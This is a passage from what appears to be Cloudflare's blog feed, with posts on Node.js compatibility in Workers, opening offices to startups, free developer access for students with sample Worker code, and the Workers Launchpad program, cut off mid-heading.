    <td><span>Principal Systems Engineer</span><br /><span>Node.js TSC</span></td>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nvpEqU0VHi3Se9fxJ5vE8/0f5628bc1756c7e3e363760be9c493ae/Yagiz.png?h=250" /></td>
  </tr>
  <tr>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></td>
    <td><a href="https://github.com/anonrig"><span>anonrig</span></a></td>
  </tr>
</tbody></table></div><p>Cloudflare is also proud to continue supporting critical infrastructure for the Node.js project through its <a href="https://openjsf.org/blog/openjs-cloudflare-partnership"><u>ongoing strategic partnership</u></a> with the OpenJS Foundation, providing free access to the project to services such as Workers, R2, DNS, and more.</p>
    <div>
      <h2>Give it a try!</h2>
      <a href="#give-it-a-try">
        
      </a>
    </div>
    <p>Our vision for Node.js compatibility in Workers is not just about implementing individual APIs, but about creating a comprehensive platform that allows developers to run existing Node.js code seamlessly in the Workers environment. This involves not only implementing the APIs themselves, but also ensuring that they work together harmoniously, and that they integrate well with the unique aspects of the Workers platform.</p><p>In some cases, such as with <code>node:fs</code> and <code>node:crypto</code>, we have had to implement entirely new capabilities that were not previously available in Workers and did so at the native runtime level. This allows us to tailor the implementations to the unique aspects of the Workers environment and ensure both performance and security.</p><p>And we're not done yet. We are continuing to work on implementing additional Node.js APIs, as well as improving the performance and compatibility of the existing implementations. We are also actively engaging with the community to understand their needs and priorities, and to gather feedback on our implementations. If there are specific Node.js APIs or npm packages that you would like to see supported in Workers, <a href="https://github.com/cloudflare/workerd/"><u>please let us know</u></a>! If there are any issues or bugs you encounter, please report them on our <a href="https://github.com/cloudflare/workerd/"><u>GitHub repository</u></a>. While we might not be able to implement every single Node.js API, nor match Node.js' behavior exactly in every case, we are committed to providing a robust and comprehensive Node.js compatibility layer that meets the needs of the community.</p><p>All the Node.js compatibility features described in this post are <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>available now</u></a>. To get started, simply enable the <code>nodejs_compat</code> compatibility flag in your <code>wrangler.toml</code> or <code>wrangler.jsonc</code> file, or via the Cloudflare dashboard or API. You can then start using the Node.js APIs in your Workers applications right away.</p> ]]></content:encoded>
            <category><![CDATA[Node.js]]></category>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Servers]]></category>
            <guid isPermaLink="false">rMNgTNdCcEh6MjAlrKkL3</guid>
            <dc:creator>James M Snell</dc:creator>
        </item>
        <item>
            <title><![CDATA[Come build with us: Cloudflare's new hubs for startups]]></title>
            <link>https://blog.cloudflare.com/new-hubs-for-startups/</link>
            <pubDate>Mon, 22 Sep 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ In 2026, Cloudflare is opening our San Francisco, Austin, London, and Lisbon offices to builders and Startups. Participants of Workers Launchpad and Cloudflare for Startups Program will be eligible ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare’s offices bring together builders in some of the world’s most popular technology hubs. We have a long history of using those spaces for one-off events and meet ups over the last fifteen years, but we want to do more. Starting in 2026, we plan to open the doors of our offices routinely to startups and builders from outside of our team who need the space to collaborate, meet new people, or just type away at a keyboard in a new (and beautiful) location.</p>
    <div>
      <h2>What are our offices meant to be?</h2>
      <a href="#what-are-our-offices-meant-to-be">
        
      </a>
    </div>
    <p>Prior to 2020, we expected essentially every team member of Cloudflare to be present in one of our offices five days a week. That worked well for us and helped facilitate the launch of dozens of technologies as well as a community and culture that defined who we are.</p><p>Like every other team on the planet, the COVID pandemic forced us to revisit that approach. We used the time to think about what our offices could be, in a world where not every team member showed up every day of the week. While we decided we would be open to remote and hybrid work, we still felt like some of our best work was done in person together. The goal became building spaces that encouraged team members to be present.</p><p>Several hard hats and a few leases later, we’ve created a network of offices around the world designed to evolve with the way people work. These spaces aren’t just places to sit — they’re environments that empower people to do their best work — whether that means quiet focus, creative problem-solving, or lively collaboration. From a library tucked into a quiet zone in our waterfront Lisbon office, to the high-ceilinged collaboration areas in the heart of Austin, each office reflects our belief that great spaces support diverse working styles and help teams thrive together.</p><p>Our offices are meant to connect our teams, and we believe that by opening our doors to the wider community, we can foster even more innovation and help new companies collaborate better. Cloudflare has always been a hub for builders, and now we're making that commitment official by welcoming startups into our physical spaces.</p>
    <div>
      <h2>Why make them even more open to the community?</h2>
      <a href="#why-make-them-even-more-open-to-the-community">
        
      </a>
    </div>
    <p>Our spaces have served as hosts to community events since the earliest days of Cloudflare. We have brought together just about every group from hackathons to language meet-ups to university orientation sessions. Cloudflare exists to help build a better Internet and in many cases a better digital environment starts with relationships built in a real life environment.</p><p>One of the most common pieces of feedback we have received in the last few years after hosting these events is “I really miss connecting with people like this.” And we hear that most often from small teams in the earliest stages of their journey. In the last few years as the start-ups we support with our platform increasingly begin remote-first and only open dedicated spaces in later stages of their growth.</p><p>We know that building a company can be a lonely path. We have helped over the last several years by providing a robust <a href="https://www.cloudflare.com/plans/free/"><u>free plan</u></a> and a comprehensive <a href="https://www.cloudflare.com/forstartups/"><u>start-up program</u></a>, but we think we can do more.</p><p>Cloudflare’s network supports a significant percentage of the Internet and, as you would expect, the Internet follows the sun. More people use it during the daytime than at night, meaning our data center utilization peaks in specific times of the day. We take advantage of that pattern to run services that are less latency-sensitive in regions overnight.</p><p>Our physical locations follow a similar pattern. Utilization resembles a bell curve with Tuesdays, Wednesdays, and Thursdays seeing a lot of traffic while Mondays and Fridays tend to be quieter. Like our CPUs at night, we think we can use that excess capacity to help build a better Internet by giving builders a space to congregate and helping our team connect with more of our users.</p>
    <div>
      <h2>How will this work?</h2>
      <a href="#how-will-this-work">
        
      </a>
    </div>
    <p>Beginning in January of 2026, we plan to make our office locations available to a capped number of external visitors as all-day coworking spaces on select days of each week. We will provide a registration process (more on that below) and set some ground rules. To start, we plan to expand this offering to San Francisco, Austin, London, and Lisbon.</p><p>When external visitors arrive, they’ll have access to our common spaces to bring together their teams or just get some work done by themselves. No mandatory talks or obligations. Just fantastic working spaces available to use at no cost.</p>
    <div>
      <h2>How can you participate?</h2>
      <a href="#how-can-you-participate">
        
      </a>
    </div>
    <p>We will provide more details in the next few weeks, but the general structure will be based on the following steps.</p><ol><li><p>Enroll in the Cloudflare for Startups Program. Bonus if you are a Workers Launchpad participant or alumni.</p></li><li><p>Sit tight for now. We will email participating Startup Program customers first to participate with a form requesting office access.</p></li><li><p>Once the form is filled out, a member of our team will reach out after. If you want to get a head start, fill out the form <a href="https://www.cloudflare.com/forstartups/"><u>here</u></a>.</p></li><li><p>We plan to roll this out on a cohort basis. Once approved and all requirements are met, register your visit (and that of any additional team members) at least three business days prior to the date requested.</p></li><li><p>Respect our working spaces as you would your own.</p></li></ol>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We hope to expand to other locations in the future. Want to get to the front of the line? Sign up for our Startup program <a href="https://www.cloudflare.com/forstartups/"><u>here</u></a> today and we will reach out to Startup Program participants before we roll out the program.</p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Workers Launchpad]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Cloudflare for Startups]]></category>
            <guid isPermaLink="false">5MEzKLtbg3GkbPxAkZtnRk</guid>
            <dc:creator>Christopher Rotas</dc:creator>
            <dc:creator>Caroline Quick</dc:creator>
        </item>
        <item>
            <title><![CDATA[Introducing free access to Cloudflare developer features for students]]></title>
            <link>https://blog.cloudflare.com/workers-for-students/</link>
            <pubDate>Mon, 22 Sep 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Students in the United States over the age of 18 with a .edu email can now get one year of free access to Cloudflare developer features. Build, experiment, and launch projects with production-grade  ]]></description>
            <content:encoded><![CDATA[ <p>I can recall countless late nights as a student spent building out ideas that felt like breakthroughs. My own thesis had significant costs associated with the tools and computational resources I needed. The reality for students is that turning ideas into working applications often requires production-grade tools, and having to pay for them can stop a great project before it even starts. We don’t think that cost should stand in the way of building out your ideas. </p><p>Cloudflare’s <a href="https://www.cloudflare.com/developer-platform/products/"><u>Developer Platform</u></a> already makes it easy for anyone to go from idea to launch. It gives you all the tools you need in one place to work on that class project, build out your portfolio, and create full-stack applications. We want students to be able to use these tools without worrying about the cost, so starting today, students at least 18 years old in the United States with a verified .edu email can receive 12 months of free access to Cloudflare’s developer features. This is the first step for <a href="http://www.cloudflare.com/students"><u>Cloudflare for Students</u></a>, and we plan to continue expanding our support for the next generation of builders.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7nFqJ4BZfhGHE8KEuJQbaX/993d1e40650f11f58a8b1f830dddf708/BLOG-2948_2.png" />
          </figure>
    <div>
      <h2>What’s included</h2>
      <a href="#whats-included">
        
      </a>
    </div>
    
    <div>
      <h3>12 months of our <a href="https://www.cloudflare.com/plans/developer-platform/"><u>paid</u></a> developer features plan at no upfront cost</h3>
      <a href="#12-months-of-our-developer-features-plan-at-no-upfront-cost">
        
      </a>
    </div>
    <p>Eligible student accounts will receive increased usage allotments for our developer features compared to our free plan. That includes Workers, Pages Functions, KV, Containers, Vectorize, Hyperdrive, Durable Objects, Workers Logpush, and Queues. With these, you can build everything from APIs and full-stack apps to data pipelines and websites. 

After 12 months, you can easily renew your subscription by upgrading to our <a href="https://www.cloudflare.com/plans/developer-platform-pricing/"><u>Workers Paid plan</u></a>. If you choose not to, your account will automatically revert to the free plan, and you won't be charged.

Here’s a look at the increased usage allotments students can receive today. Above those free allotments, our <a href="https://developers.cloudflare.com/workers/platform/pricing/"><b><u>standard usage rates will apply</u></b></a>.</p><table><tr><th><p>
</p></th><th><p><b>Free Plan</b></p></th><th><p><b>Student Accounts (Paid developer features)</b></p></th></tr><tr><td><p><a href="https://developers.cloudflare.com/workers/"><b><u>Workers</u></b></a></p></td><td><p>100,000 requests/day</p><p>

</p></td><td><p>10 million requests/month</p><p><b>+ $.30 per additional million requests</b></p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/kv/"><b><u>Workers KV</u></b></a></p></td><td><p>100,000 read operations/day</p><p>1,000 write, delete, list operations per day</p></td><td><p>10 million read operations/month</p><p>1 million write, delete, and list operations per month</p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/hyperdrive/"><b><u>Hyperdrive</u></b></a></p></td><td><p>100,000 database queries/day</p></td><td><p>Unlimited database queries / day</p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/durable-objects/"><b><u>Durable Objects</u></b></a></p></td><td><p>100,000 requests/day	</p></td><td><p>1 million requests / day</p><p><b>+ $0.15 / per additional million requests</b></p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/workers/observability/logs/workers-logs/"><b><u>Workers Logs</u></b></a></p></td><td><p>200,000 log events / day</p><p></p><p>3 Days of retention</p></td><td><p>20 million log events / month </p><p>7 Days of retention</p><p><b>+$0.60 per additional million events</b></p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/workers/observability/logs/logpush/"><b><u>Workers Logpush</u></b></a></p></td><td><p>Not Included</p></td><td><p>10 million log events / month</p><p><b>+$0.05 per additional million log events</b></p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/queues/"><b><u>Queues</u></b></a></p></td><td><p>Not Included</p></td><td><p>1 million operations/month included </p><p><b>+$0.40 per additional million operations</b></p></td></tr></table>
    <div>
      <h3>Access to a dedicated student developer community</h3>
      <a href="#access-to-a-dedicated-student-developer-community">
        
      </a>
    </div>
    <p>You’ll also have access to a dedicated <a href="https://discord.com/channels/595317990191398933/1417794672994287667"><u>Discord channel</u></a> just for students. We want to see what you’re building! This is a place to connect with peers, get support, and share ideas in a community of student developers.</p>
    <div>
      <h2>What others have built with Cloudflare’s Developer Platform</h2>
      <a href="#what-others-have-built-with-cloudflares-developer-platform">
        
      </a>
    </div>
    <p>Curious about what’s possible with Cloudflare’s developer features? Here are some projects from our community:</p>
    <div>
      <h3><a href="https://danifoldi.com/adventure"><u>Adventure</u></a> </h3>
      <a href="#">
        
      </a>
    </div>
    <p>by <a href="https://hu.linkedin.com/in/daniel-foldi"><u>Daniel Foldi</u></a></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4MUZkkTT0VlwEOaCnkxGMD/9d7845e992fbdfeb75b72ce9f0743497/BLOG-2948_3.png" />
          </figure><p>Adventure is a text-based adventure game running on Cloudflare Workers that uses <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a> to generate the stories with the <a href="https://developers.cloudflare.com/workers-ai/models/gemma-3-12b-it/"><u>@cf/google/gemma-3-12b-it</u></a> model. </p><p>The project’s developer chose <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a> with the<a href="https://opennext.js.org/cloudflare"><u> OpenNext adapter</u></a> because it made deployment simple and handled scaling automatically. It uses the Workers Paid plan mainly to enable <a href="https://developers.cloudflare.com/workers/observability/logs/logpush/"><u>Workers Logpush</u></a> and get access to detailed logs for better monitoring and analysis.</p><p>When a new game starts, the server gives the AI a custom prompt to set the scene and explain how the adventure should work. From there, each time the player makes a choice, their story history is sent back to the server, which asks the AI to continue the narrative, allowing the story to evolve dynamically based on the player’s choices.</p><p>The code below shows how this logic is implemented:</p>
            <pre><code>"use server";
import { getCloudflareContext } from "@opennextjs/cloudflare";

async function prime(env: CloudflareEnv) {
  const id = Math.floor(Math.random() * 1000000);//unique ID for each game run
  const messages = [
    {
      role: "user",
      content:
        `The user is playing a text-based adventure game. Each game is different, this is game ${id}. Your first job is to create a short background story in 3-4 sentences. Scenarios may include interesting locations such as jungles, deserts, caves.
        After the first message, each of your messages will be responses to the user interaction. State three short options (A, B, C). The user responses will be the chosen action. Your responses should end by asking the user about their choice.
        Your message will be shown to the user directly, so avoid "Certainly", "Great", "Let's get started", and other filler content, and avoid bringing up technical details such as "this is game #id".
        The games should have a win condition that is actually feasible given the story, and if the player loses, the message should end with "Try again.".
        `,
    },
  ];
  //Call Workers AI to generate the first response (story intro)
  const { response } = await env.AI.run("@cf/google/gemma-3-12b-it", { messages });

  return [
    ...messages,
    { role: "assistant", content: response }
  ];
}

/**
 * Main server action for the adventure game.
 * If no input yet, it primes the game with the opening story
 * If there is input, it continues the story based on the full history
 * Uses getCloudflareContext from @opennextjs/cloudflare to access env.
 */
export async function adventureAction(input: any[]) {
  let { env } = await getCloudflareContext({ async: true });

  return input.length === 0
  ? await prime(env)
  : [...input,
      { role: "assistant", content: (await env.AI.run("@cf/google/gemma-3-12b-it", { messages: input })).response }
  ];
}
</code></pre>
            
    <div>
      <h3><a href="https://github.com/MattIPv4/DNS-over-Discord"><u>DNS over Discord</u></a> </h3>
      <a href="#">
        
      </a>
    </div>
    <p>by <a href="https://uk.linkedin.com/in/matt-ipv4-cowley"><u>Matt Cowley</u></a></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/l35HNO2qVPzmR31EWupcy/3bc9f51cb2fa26654ca4a679e577ce98/BLOG-2948_4.png" />
          </figure><p>DNS over Discord is a bot that lets you run DNS lookups right inside Discord. Instead of switching to a terminal or online tool, you can use simple slash commands to check records like A, AAAA, MX, TXT, and more.</p><p>The developer behind the project chose <a href="https://www.cloudflare.com/developer-platform/products/workers/"><u>Cloudflare Workers</u></a> because it’s a great platform for running small JavaScript apps that handle requests, which made it a good fit for Discord’s slash commands. Since every command translates into a request and the bot sees a lot of traffic, the free tier wasn’t enough, so it now runs on Workers Paid to keep up reliably without hitting request limits.</p><p>In this project, the Worker checks if the request is a Discord interaction, and if so, it sends it to the right command (e.g., /dig, /multi-dig, etc.), using a handler that calls out to a <a href="https://github.com/MattIPv4/workers-discord"><u>custom framework</u></a> for Discord slash commands. If it’s not from Discord, it can also serve routes like the privacy page or terms of service.</p><p>Here’s what that looks like in code:</p>
            <pre><code>export default {
  // Process all requests to the Worker
  fetch: async (request, env, ctx) =&gt; {
    try {
      // Include the env in the context we pass to the handler
      ctx.env = env;

      // Check if it's a Discord interaction (or a health check)
      const resp = await handler(request, ctx);
      if (resp) return resp;

      // Otherwise, process the request
      const url = new URL(request.url);

      if (request.method === 'GET' &amp;&amp; url.pathname === '/privacy')
        return new textResponse(Privacy);

      if (request.method === 'GET' &amp;&amp; url.pathname === '/terms')
        return new textResponse(Terms);

      // Fallback if nothing matches
      return new textResponse(null, { status: 404 });
    } catch (err) {
      // Log any errors
      captureException(err);

      // Re-throw the error
      throw err;
    }
  },
};
</code></pre>
            
    <div>
      <h3><a href="http://placeholders.dev"><u>Placeholders.dev </u></a></h3>
      <a href="#">
        
      </a>
    </div>
    <p>by <a href="https://uk.linkedin.com/in/jamesross134"><u>James Ross</u></a></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/18CfHbpzQJGrYTTda86cU8/31b5419cba4799301e3e4116cf8149c9/BLOG-2948_5.png" />
          </figure><p><code>placeholders.dev</code> is a service that generates placeholder images, making it easy for developers to prototype and scaffold websites without dealing with hosting or asset management. Users can generate placeholders instantly with a simple URL, such as: <code>https://images.placeholders.dev/350x150</code></p><p>Since placeholders are typically used in early development, speed and consistency matter, and images need to load instantly so the workflow isn’t interrupted. Running on Cloudflare Workers makes the service fast and consistent no matter where developers are.</p><p>This project uses the Workers Paid plan because it regularly exceeds the free-tier limits on requests and compute time. The Worker below shows the core of how the service works. When a request comes in, it looks at the URL path (like /<code>300x150</code>) to determine the size of the placeholder, applies some defaults for style, and then returns an SVG image on the fly.</p>
            <pre><code>export default {
  async fetch(request: Request, env: Env, ctx: ExecutionContext) {
    try {
      const url = new URL(request.url);
      const cache = caches.default;

      // Handle requests for the placeholder API
      if (url.host === 'images.placeholders.dev' || url.pathname.startsWith('/api')) {
        // Try edge cache first
        const cached = await cache.match(url, { ignoreMethod: true });
        if (cached) return cached;

        // Default placeholder options
        const imageOptions: Options = {
   dataUri: false, // always return an unencoded SVG source
          width: 300,
          height: 150,
          fontFamily: 'sans-serif',
          fontWeight: 'bold',
          bgColor: '#ddd',
          textColor: 'rgba(0,0,0,0.5)',
        };

        // Parse sizes from path (e.g. /350 or /350x150)
        const sizeParts = url.pathname.replace('/api', '').replace('/', '').split('x');
        if (sizeParts[0]) {
          const width = sanitizeNumber(parseInt(sizeParts[0], 10));
          const height = sizeParts[1] ? sanitizeNumber(parseInt(sizeParts[1], 10)) : width;
          imageOptions.width = width;
          imageOptions.height = height;
        }

        // Generate SVG placeholder
        const response = new Response(simpleSvgPlaceholder(imageOptions), {
          headers: { 'content-type': 'image/svg+xml; charset=utf-8' },
        });

        // Cache result
        response.headers.set('Cache-Control', 'public, max-age=' + cacheTtl);
        ctx.waitUntil(cache.put(url, response.clone()));

        return response;
      }

      return new Response('Not Found', { status: 404 });
    } catch (err) {
      console.error(err);
      return new Response('Internal Error', { status: 500 });
    }
  },
};
</code></pre>
            <p>Check out <a href="https://workers.cloudflare.com/built-with/collections/workers"><u>Built With Workers</u></a> to see what other developers are building with our developer platform.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2fjxaPtQYSIFVVfDaXqYSU/57d4c94d129832dd77c0a9fc20b812a6/BLOG-2948_6.png" />
          </figure>
    <div>
      <h2>How do I get started?</h2>
      <a href="#how-do-i-get-started">
        
      </a>
    </div>
    <p>This offering is available to United States students at least 18 years old with a <a href="https://developers.cloudflare.com/fundamentals/user-profiles/verify-email-address/"><u>verified</u></a> .edu billing email address. </p><p>Just ensure your <a href="https://developers.cloudflare.com/fundamentals/user-profiles/verify-email-address/"><u>verified</u></a> .edu email address is added to <a href="https://developers.cloudflare.com/billing/update-billing-info/#update-billing-email-address"><u>your billing details</u></a> and add our Workers Paid plan to your subscription.</p><table><tr><th><p>
</p></th><th><p><b>New .edu accounts</b></p></th><th><p><b>Existing .edu accounts </b></p></th></tr><tr><td><p>Creation Date </p></td><td><p>Created on/after September 22, 2025</p></td><td><p>Created prior to September 22, 2025</p></td></tr><tr><td><p>Confirm your eligibility</p></td><td><p><a href="https://www.cloudflare.com/sign-up"><u>Sign up</u></a> for a free Cloudflare account, add your credit card and ensure your <a href="https://developers.cloudflare.com/fundamentals/user-profiles/verify-email-address/"><u>verified</u></a> .edu email address is added to <a href="https://developers.cloudflare.com/billing/update-billing-info/#update-billing-email-address"><u>your billing details.</u>  </a></p></td><td><p>Ensure your <a href="https://developers.cloudflare.com/fundamentals/user-profiles/verify-email-address/"><u>verified</u></a> .edu email address is <a href="https://developers.cloudflare.com/billing/update-billing-info/#update-billing-email-address"><u>added to your billing details.</u>  </a></p></td></tr><tr><td><p>How to Redeem</p></td><td><p>Visit your <a href="https://dash.cloudflare.com/?to=/:account/workers/plans/purchase"><u>Workers Plans page</u></a> in the dashboard and add the Workers Paid plan to your subscription</p></td><td><p></p></td></tr></table><p><sub><i>Note: in order to receive the credit, your verified .edu email address needs to be your billing </i></sub></p>
    <div>
      <h2>Expanding Cloudflare for Students coverage</h2>
      <a href="#expanding-cloudflare-for-students-coverage">
        
      </a>
    </div>
    <p>While our first offering is primarily for institutions in the US, we’re working on expanding support for our students in other countries and plan to add additional higher education domain names after launch. If you’re at an educational institution outside of the United States, <a href="http://www.cloudflare.com/students"><u>please reach out to us and apply</u></a> for your educational/academic domain to be added. We’ll let you know as soon as it becomes available in your region. Check our <a href="http://www.cloudflare.com/students"><u>Cloudflare for Students</u></a> page for updates and keep an eye out for emails if you have an account with a newly supported domain.</p><p>Whether you're gearing up for your first hackathon, launching a side project, or looking to build the next big thing, you can get started today with free access and join a global developer community already building on Cloudflare.</p><p>Get started by <a href="http://www.cloudflare.com/students"><u>signing up or requesting access today</u></a>.  </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3GaE9EPpIIv2YX6Gewps0y/75b0bb5e4f4f71b3ec5bb945c8b9a536/BLOG-2948_7.png" />
          </figure><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Serverless]]></category>
            <guid isPermaLink="false">4ENCSXn82EzWHyNI8IGlGL</guid>
            <dc:creator>Veronica Marin</dc:creator>
            <dc:creator>Howard Huang</dc:creator>
        </item>
        <item>
            <title><![CDATA[A lookback at Workers Launchpad and a warm welcome to cohort #6]]></title>
            <link>https://blog.cloudflare.com/workers-launchpad-006/</link>
            <pubDate>Mon, 22 Sep 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Workers Launchpad program offers resources and mentorship for founders building on the Cloudflare network. Learn more about prior cohorts, where Launchpad alumni are today, and the participants  ]]></description>
            <content:encoded><![CDATA[ <p>Imagine you have an idea for an AI application that you’re really excited about — but the cost of GPU time and complex infrastructure stops you in your tracks before you even write a line of code. This is the problem founders everywhere face: balancing high infrastructure costs with the need to innovate and scale quickly.</p><p>Our startup programs remove those barriers, so founders can focus on what matters the most: building products, finding customers, and growing a business. <a href="http://www.cloudflare.com/forstartups"><u>Cloudflare for Startups</u></a> launched in 2018 to provide enterprise-level application security and performance services to growing startups. As we built out our Developer Platform, we pivoted last year to offer founders up to <code>$250,000</code> in cloud credits to build on our Developer Platform for up to one year.</p><p>During Birthday Week 2022, we announced our <a href="http://www.cloudflare.com/lp/workers-launchpad"><u>Cloudflare Workers Launchpad Program</u></a> with an initial <code>$1.25</code> billion in potential funding for startups building on Cloudflare Workers, made possible through partnerships with 26 leading venture capital (VC) firms. Within months, we expanded VC-backed funding to <code>$2 </code>billion.</p><p>Since 2022, we’ve welcomed 145 startups from 23 countries. These startups are solving problems across verticals such as AI and machine learning, developer tools, 3D design, cloud infrastructure, data tools, ad tech, media, logistics, finance, and other industries. We’re especially proud of the female founder representation in recent cohorts — with nearly a third of companies in Cohort #5 run by a female founder. </p><p>Participants engaged in bootcamp sessions with Cloudflare leadership and product teams, covering key topics like product pricing and scaling sales. Startups received hands-on design support from our Solutions Architecture team, empowering these builders to build and scale their full-stack applications on the Cloudflare network. We facilitate countless introductions across the VC network, and are happy to see funding and M&amp;A activity as these startups scale. Cloudflare also identified direct opportunities and acquired Nefeli Networks (Cohort #2) and Outerbase (Cohort #4).</p><p>Check out what Launchpad alumni have to say about their experience in the program:</p><p><a href="http://www.langbase.com"><b><u>Langbase</u></b></a><b> (Cohort #3)
</b><i>Ship hyper-personalized AI apps to any LLM, any data, any developer in seconds</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3r5wg5yas34Bc6BDFlp33C/aee74d04ac0ac463da4a6c667cd8b9b0/BLOG-2952_2.png" />
          </figure><blockquote><p><i>"For Langbase, the best part about Workers Launchpad was the incredible support from Cloudflare’s internal teams. It wasn’t just about access to infrastructure; it was the hands-on migration help, rapid feedback loops, and genuine partnership from engineers, product folks, and the broader Cloudflare community. That human support empowered us to iterate faster, solve hard problems, and truly feel like we were building something impactful together. </i></p><p><i>Langbase has quickly become one of the most powerful serverless AI clouds for building and deploying AI agents. We process 700 TB of agent memory and 1.2 billion AI agent runs a month. Langbase is an agent lab, and we’ve also launched a coding agent called </i><a href="http://www.command.new"><i><u>Command.new</u></i></a><i>, an "agent of agents" that can take your prompts and turn them into production-ready agents by provisioning infrastructure and writing the agent's code in TypeScript.</i></p><p><i>My advice for anyone joining future Workers Launchpad cohorts is to use every resource offered. Engage deeply with the Cloudflare teams, ask for feedback early and often, and be open to sharing your challenges and wins, especially in the Discord community, which is super helpful. Cloudflare listens closely to participant feedback and genuinely wants to help startups succeed. Treat it as a two-way conversation and a collaborative growth opportunity. This mindset is what unlocks the real power of the program."</i></p><p><i>-Ahmad Awais, Founder &amp; CEO of Langbase</i></p></blockquote><p><a href="http://sherpo.io"><b><u>Sherpo.io</u></b></a><b> (Cohort #4)
</b><i>AI-first no-code platform to build and sell digital content</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4a3wXoJpyWJxEe0pggamUS/848f48e1450b8b14d59fec12f7d6e2ad/BLOG-2952_3.png" />
          </figure><blockquote><p><i>“Since joining Cohort #4, we’ve exited closed beta and expanded our product suite for content creators. Today, more than 3,000 creators worldwide power their digital product stores with Sherpo, while we continue building and scaling.</i></p><p><i>We learned as much from fellow startups as from Cloudflare during office hours and sessions, and we got to meet incredible people along the way, including Cloudflare’s CSO, Stephanie Cohen.</i></p><p><i>For anyone joining, attend every session, listen closely, and ask questions—they’re incredibly valuable. Building on Workers has given us a real advantage, and the team’s pace of innovation only compounds it.”</i></p><p><i>-Giacomo Di Pinto, Co-Founder &amp; CEO of </i><a href="http://sherpo.io"><i><u>Sherpo.io</u></i></a></p></blockquote><p><a href="http://www.tightknit.ai"><b><u>Tightknit AI</u></b></a><b> (Cohort #4)
</b><i>Embedded community engagement platform built for SaaS</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6fOoareglMG6RMUanGmxXF/1fde7135f1ced8921cdb463f60d9b52b/BLOG-2952_4.png" />
          </figure><blockquote><p><i>"Beyond the cloud credits that Launchpad provided us to play with every Cloudflare product, the most important aspect of the program we found was our ability to access (and even contribute) to the product roadmap. We were able to connect with product managers and solutions architects that have helped us take our work to the next level.</i></p><p><i>We've recently passed half a million users on the platform and have started to close not just the top Saas businesses in the world, but the top AI companies in the world, including Clay, Gamma, Lindy, beehiiv, Amplitude, Mixpanel, and so many more. The best part is that 100% of application logic is still powered by Cloudflare!</i></p><p><i>The biggest piece of advice for anyone starting the cohort is attend office hours as much as you can. I can't tell you how many times we were able to unblock ourselves or even provide real product feedback/bug reports. It was amazing to meet the rest of the cohort and solve problems together that ordinary Cloudflare developers just do not face. So my advice is don't miss the office hours. They were by far the most valuable part of our experience."</i></p><p><i>-Zach Hawtof, Co-Founder &amp; CEO of </i><a href="http://tightknit.ai"><i><u>Tightknit.ai</u></i></a></p></blockquote><p><a href="http://www.renderbetter.com"><b><u>Render Better</u></b></a><b> (Cohort #4)
</b><i>Increase e-commerce revenue by automatically optimizing your site speed</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1oVBIcUMsMgCvKMyPlbfIH/d4442571c914aded7f142b617a87f2e1/BLOG-2952_5.png" />
          </figure><blockquote><p><i>"My favorite part of the Launchpad was the community and the leaders who brought us together. The startup and product teams provided expert advice on both business and technical questions through meetings, 1-on-1s, and Discord. Many of them were former founders, so they understood what we were going through and helped us get what we needed. They were crucial in helping us get unstuck, whether we were using obscure Cloudflare features or needed connections to the right people.</i></p><p><i>I met a lot of great founders who are on the same journey and face the same struggles. Watching them grow was motivating and gave us a morale boost to keep up the fast pace a startup needs.</i></p><p><i>Since Launchpad, Render Better has scaled to 60 automated site speed optimizations, helping e-commerce sites convert 20% higher powered by Cloudflare Workers. Our growth accelerated after the program, and we're now optimizing traffic for some of the biggest e-commerce brands like PSD, Polywood, and Self-Portrait. Render Better now processes 5 billion requests each month, made possible by Cloudflare's global edge network and Workers platform.</i></p><p><i>Launchpad is truly just that: Cloudflare gives you the resources and attention to help you grow from an idea into something big. Build fast and take as much advantage of the fuel they give you to fly your startup rocket!"</i></p><p><i>-James Koshigoe, Founder &amp; CEO of Render Better</i></p></blockquote><p>Launchpad is growing into more than just a program. It is a community of builders and innovators showing what is possible with Cloudflare’s network behind them. With that foundation, we are excited to introduce the next group of entrepreneurs taking the stage in Cohort #6.</p><p><b>Introducing Cohort 